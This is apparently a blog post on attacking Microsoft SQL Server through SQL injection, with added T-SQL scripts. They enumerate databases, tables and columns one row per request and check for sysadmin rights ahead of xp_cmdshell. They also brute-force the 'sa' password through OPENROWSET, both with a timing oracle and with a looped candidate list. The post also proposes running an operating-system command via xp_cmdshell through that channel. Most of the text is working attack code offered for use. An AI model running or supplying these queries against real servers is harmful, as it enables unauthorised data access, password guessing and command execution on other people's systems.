Some information about MS-SQL server. You may find this info useful for exploiting SQL injection:
Finding Table Names:
Do not use: SELECT name FROM sysobjects WHERE xtype='U'
Use: SELECT table_name FROM INFORMATION_SCHEMA.TABLES
[WHERE table_schema = 'schema_or_owner']
[WHERE|AND table_name LIKE 'wild']
Both queries list only the database you are currently connected to: sysobjects is a per-database table (a deprecated compatibility view from SQL Server 2005 on), and the INFORMATION_SCHEMA views are also scoped to the current database. The second form is preferable because it is standard SQL, returns views as well as tables (table_type tells them apart, table_schema is the schema or owner such as dbo, and table_catalog is the database name), and it can be pointed at any other database the current user has access to by prefixing it with the database name, e.g. SELECT table_name FROM other_db.INFORMATION_SCHEMA.TABLES. The names of the other databases come from master..sysdatabases (sys.databases on 2005 and later).
Getting Current User
Someone pointed out that SELECT USER returns the name of the database user in the current database, not the login: any login mapped as the owner of the database shows up as 'dbo', so it may differ from the account you actually authenticated as. SELECT SYSTEM_USER returns the login name and is always the one to use. Whether that login is a sysadmin is a separate question, answered by SELECT IS_SRVROLEMEMBER('sysadmin') (1 for yes, 0 for no).
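The following is an added example, not code from the original post: one T-SQL recon script covering both sections above, identity first (USER versus SYSTEM_USER plus the sysadmin check) and then database, table and column enumeration, including the one-row-per-request trick for an injection point that only shows a single value. The database name other_db, the table name users and the already-seen names in the last query are placeholders.

```sql
-- Added example (not from the original post). Names such as other_db and
-- users are placeholders; adjust them to the target.

-- Who am I?  USER is the database-user name inside the current database
-- (a login mapped as the database owner shows as 'dbo'); SYSTEM_USER is the
-- login that actually authenticated, which is the name you want.
SELECT USER        AS db_user,
       SYSTEM_USER AS login_name,
       DB_NAME()   AS current_db;

-- Does the login hold sysadmin?  1 = yes, 0 = no. Decides whether
-- xp_cmdshell and friends are even an option.
SELECT IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;

-- Which databases exist?  Visible to every login by default.
SELECT name FROM master..sysdatabases;       -- SQL Server 2005+: sys.databases

-- Tables in the current database. INFORMATION_SCHEMA is per database, so this
-- never lists objects from other databases.
SELECT table_schema, table_name, table_type
FROM INFORMATION_SCHEMA.TABLES
WHERE table_type = 'BASE TABLE'              -- drop this line to include views
ORDER BY table_schema, table_name;

-- Tables in another database the login can access: prefix the view with the
-- database name.
SELECT table_schema, table_name
FROM other_db.INFORMATION_SCHEMA.TABLES
WHERE table_name LIKE '%user%';

-- Columns of a table once you have its name.
SELECT column_name, data_type, character_maximum_length
FROM INFORMATION_SCHEMA.COLUMNS
WHERE table_name = 'users'
ORDER BY ordinal_position;

-- Through an injection point that shows one value per request: return the
-- first table name not yet seen, then add each result to the NOT IN list for
-- the next request until nothing comes back.
SELECT TOP 1 table_name
FROM INFORMATION_SCHEMA.TABLES
WHERE table_name NOT IN ('dtproperties', 'users')
ORDER BY table_name;
```

Each statement stands on its own, so a single one can be dropped into an injection point as needed; the NOT IN pattern in the last query is what makes enumeration workable when only one row is ever reflected back.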
Brute Forcing 'sa' User's Password
Use openrowset: select null from openrowset('sqloledb','';'sa';'[password]','select 1;waitfor delay ''0:0:10'' ')
When the password supplied is correct, the query 'select 1;waitfor delay ''0:0:10'' ' gets executed and the response arrives ten seconds late; when it is wrong, the login fails immediately with an error, so the delay is the oracle for each guess. This needs ad hoc distributed queries to be allowed (on by default in SQL Server 2000, off by default from 2005 onwards unless sp_configure 'Ad Hoc Distributed Queries' has been set to 1). As I write this blog, I am just wondering if we can execute something like this:
select null from openrowset('sqloledb','';'sa';'[password]','exec master..xp_cmdshell ''ping my_host'''). I will confirm this sometime later.
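As an added example, not code from the original post: the same openrowset probe driven from a T-SQL loop, for the case where the injection point allows stacked queries or you already hold a low-privileged login and only want sa. It assumes SQL Server 2005 or later (TRY/CATCH and NVARCHAR(MAX)), that ad hoc distributed queries are enabled, and the empty data source is written exactly as in the post's query; the candidate password list is constructed for the example.

```sql
-- Added example (not from the original post). Assumes SQL Server 2005+
-- (TRY/CATCH) and 'Ad Hoc Distributed Queries' enabled. The candidate
-- password list is constructed for this example.
SET NOCOUNT ON;

DECLARE @candidates TABLE (id INT IDENTITY(1,1), pwd NVARCHAR(128));
INSERT INTO @candidates (pwd) VALUES (N'');
INSERT INTO @candidates (pwd) VALUES (N'sa');
INSERT INTO @candidates (pwd) VALUES (N'password');
INSERT INTO @candidates (pwd) VALUES (N'P@ssw0rd');

DECLARE @found NVARCHAR(128);                    -- stays NULL until a login works
DECLARE @i INT, @n INT, @pwd NVARCHAR(128), @sql NVARCHAR(MAX);
SET @i = 1;
SELECT @n = COUNT(*) FROM @candidates;

WHILE @i <= @n AND @found IS NULL
BEGIN
    SELECT @pwd = pwd FROM @candidates WHERE id = @i;

    -- Builds: SELECT * FROM OPENROWSET('SQLOLEDB','';'sa';'<pwd>','SELECT 1 AS probe')
    -- OPENROWSET only accepts literals, so the probe has to be dynamic SQL.
    -- Single quotes in the candidate are doubled so they stay inside the literal.
    SET @sql = N'SELECT * FROM OPENROWSET(''SQLOLEDB'','''';''sa'';'''
             + REPLACE(@pwd, N'''', N'''''')
             + N''',''SELECT 1 AS probe'')';

    BEGIN TRY
        EXEC (@sql);            -- returns a row only if the login succeeds
        SET @found = @pwd;
    END TRY
    BEGIN CATCH
        -- Wrong password: login failure (18456) or a provider error. Keep going.
        SET @pwd = NULL;
    END CATCH;

    SET @i = @i + 1;
END

SELECT @found AS sa_password;   -- NULL if no candidate worked
```

Without TRY/CATCH (SQL Server 2000) the loop cannot swallow the login error, so each candidate has to be sent as its own request and judged by the waitfor delay timing exactly as in the single query above.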